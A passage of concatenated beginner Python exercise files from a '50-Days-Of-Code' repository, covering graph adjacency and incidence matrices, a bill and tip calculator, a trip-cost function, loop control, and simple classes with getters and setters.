graph[v1].append((v1, v2))
# graph[v2].append((v2, v1))
return graph
def load_graph():
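# grafo.txt layout (as written by save_graph): first line is the vertex count, then one "v1,v2" edge per line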
file = open('grafo.txt', 'r')
qtd_vertices = int(file.readline())
graph = {}
# writing vertices in graph
for i in range(qtd_vertices):
graph[i+1] = []
for line in file:
# each remaining line has the form "v1,v2"
v1, v2 = (int(value) for value in line.strip().split(','))
graph[v1].append((v1, v2))
file.close()
print('\n\tGrafo carregado com sucesso!\n')
return graph
def save_graph(graph):
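# writes the vertex count, then one "v1,v2" line per edge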
file = open("grafo.txt", "w")
stream = list()
qtd_vertices = str(len(graph.keys()))
stream.append(qtd_vertices+'\n')
for edges in graph.values():
for edge in range(len(edges)):
line = str(edges[edge])
# strip parentheses and spaces so the tuple repr "(1, 2)" becomes "1,2"
line = line.replace(")", "")
line = line.replace("(", "")
line = line.replace(" ", "")
line += '\n'
stream.append(line)
file.writelines(stream)
file.close()
print(f'\n\tGrafo salvo com sucesso!')
def get_vertices(graph):
vertices = []
for vertex in graph.keys():
vertices.append(vertex)
return vertices
def get_edges(graph):
edges = []
for i in graph.values():
for j in range(len(i)):
edge = i[j]
edges.append(edge)
return edges
def adjacency_matrix(graph):
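# builds a |V| x |V| 0/1 matrix; each edge is recorded in both [v1][v2] and [v2][v1] since the graph is undirected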
vertices = get_vertices(graph)
edges = get_edges(graph)
matrix = [[0 for _ in vertices] for _ in vertices]
for edge in edges:
v1 = int(edge[0])
v2 = int(edge[1])
matrix[v1-1][v2-1] = 1
# mirror across the main diagonal (edges are undirected)
matrix[v2-1][v1-1] = 1
return matrix
def incidence_matrix(graph):
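# rows are vertices, columns are edges; a self-loop counts as 2, any other incident edge as 1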
vertices = get_vertices(graph)
edges = get_edges(graph)
matrix = [[0 for _ in edges] for _ in vertices]
for vertex in vertices:
count = 0
for edge in edges:
if(edge[0] == vertex and edge[1] == vertex):
value = 2
elif (vertex in edge):
value = 1
else:
value = 0
matrix[(vertex-1)][count] = value
count += 1
return matrix
def adjacency_list(graph):
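# for each vertex, collect the opposite endpoint of every edge that touches it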
vertices = get_vertices(graph)
edges = get_edges(graph)
adjacency_list = {}
for vertex in vertices:
neighbors = []
for edge in edges:
if (vertex in edge):
neighbor = edge[1 if(vertex == edge[0]) else 0]
neighbors.append(neighbor)
adjacency_list[vertex] = neighbors
return adjacency_list
def show(graph):
print(f' Vértice\tAresta(s)\n')
for vertex, edge in graph.items():
print(f'\t{vertex}:\t{edge}')
``` |
{
"source": "01coders/50-Days-Of-Code",
"score": 4
} |
#### File: 50-Days-Of-Code/python_MA1/day_12.py
```python
def tax(bill):
"""Adds 8% tax to a restaurant bill."""
bill *= 1.08
print ("With tax: %f" % bill)
return bill
#2
def tip(bill):
"""Adds 15% tip to a restaurant bill."""
bill *= 1.15
print ("With tip: %f" % bill)
return bill
meal_cost = 100
meal_with_tax = tax(meal_cost) #108.00
meal_with_tip = tip(meal_with_tax) #124.20
#Functions 3
def square(n):
"""Returns the square of a number."""
squared = n ** 2
print ("%d squared is %d." % (n, squared))
return squared
square(10) #100
#4
def power(base,exponent):
result = base ** exponent
print ("%d to the power of %d is %d." % (base, exponent, result))
power(5,3) #5 to the power of 3 is 125.
#5
import math
print(math.sqrt(25)) #5.0
#from math import * //imports all math functions
#6
def biggest_number(*args):
print (max(args))
return max(args)
def smallest_number(*args):
print (min(args))
return min(args)
def distance_from_zero(arg):
print (abs(arg))
return abs(arg)
biggest_number(-10, -5, 5, 10)
smallest_number(-10, -5, 5, 10)
distance_from_zero(-10)
#OUTPUT
#10
#-10
#10
```
#### File: 50-Days-Of-Code/python_MA1/day_14.py
```python
def hotel_cost(days):
return 140 * days
def plane_ride_cost(city):
if city == "Charlotte":
return 183
elif city == "Tampa":
return 220
elif city == "Pittsburgh":
return 222
elif city == "Los Angeles":
return 475
def rental_car_cost(days):
cost = days * 40
if days >= 7:
cost -= 50
elif days >= 3:
cost -= 20
return cost
def trip_cost(city, days, spending_money):
return rental_car_cost(days) + hotel_cost(days) + plane_ride_cost(city) + spending_money
print (trip_cost("Los Angeles", 5, 600))
#1955
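# Worked example (added for illustration): a 3-day trip to Tampa with 100 of
# spending money costs rental 100 (120 - 20) + hotel 420 + flight 220 + 100.
print (trip_cost("Tampa", 3, 100))
#840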
#Break & Continue
count=0
result=0
for count in range(1,10):
result=result+count
if result>6:
break
print("result=",result) #result=10
count=0
for count in range(0,10):
if count<5:
continue
print(count) #5,6,7,8,9
```
#### File: 50-Days-Of-Code/python_parikshith21/Day30.py
```python
class vehicle:
def __init__(self,wheels,capacity,fuel):
self.w=wheels
self.c=capacity
self.f=fuel
def display(self):
print(self.w,self.c,self.f)
car=vehicle(4,15,'petrol')
car.display()
car=vehicle(4,5,'diesel')
car.display()
# =============================================================================
# #output:
# 4 15 petrol
# 4 5 diesel
# =============================================================================
bike=vehicle(2,5,'petrol')
bike.display()
# =============================================================================
# #output:
# 2 5 petrol
# =============================================================================
class vehicle:
def __init__(self,wheels=0,capacity=0,fuel='diesel'):
self.w=wheels
self.c=capacity
self.f=fuel
def assign(self,wheels,capacity,fuel):
self.w=wheels
self.c=capacity
self.f=fuel
def display(self):
print(self.w,self.c,self.f)
car=vehicle(4,5,'petrol')
car.display()
# =============================================================================
# #output:
# 4 5 petrol
# =============================================================================
bike=vehicle()
bike.display()
# =============================================================================
# #output:
# 0 0 diesel
# =============================================================================
auto=vehicle()
auto.display()
# =============================================================================
# #output:
# 0 0 diesel
# =============================================================================
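# Illustrative addition (not in the original file): assign can overwrite the
# default values after construction.
auto.assign(3,8,'petrol')
auto.display()
# =============================================================================
# #output:
# 3 8 petrol
# =============================================================================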
```
#### File: 50-Days-Of-Code/python_parikshith21/Day36.py
```python
class Date:
def __init__(self,day,month,year):
self.__day=day
self.__month=month
self.__year=year
def get_day(self):
return self.__day
def get_month(self):
return self.__month
def get_year(self):
return self.__year
def set_day(self,value):
self.__day=value
def set_month(self,value):
self.__month=value
def set_year(self,value):
self.__year=value
class customer:
def __init__(self,name,num,dob):
self.__name=name
self.__num=num
self.__dob=dob
def get_name(self):
return self.__name
def get_num(self):
return self.__num
def get_dob(self):
return self.__dob
def set_name(self,value):
self.__name=value
def set_num(self,value):
self.__num=value
def set_dob(self,value):
self.__dob=value
d=Date(13,11,1998)
c1=customer("Manoj",7204444566,d)
print(c1.get_name(),c1.get_num(),c1.get_dob().get_day()) #Manoj 7204444566 13
temp=c1.get_dob()
print(temp.get_day()) #13
temp.set_year(1999)
print(temp.get_day(),temp.get_month(),temp.get_year()) #13 11 1999
c1.get_dob().set_year(2000)
# =============================================================================
# #output:
# Manoj 7204444566 13
# 13
# 13 11 1999
# =============================================================================
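# Illustrative addition (not in the original file): c1 and temp reference the
# same Date object, so the set_year(2000) call above is visible through both.
print(c1.get_dob().get_year()) #2000
print(temp.get_year()) #2000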
``` |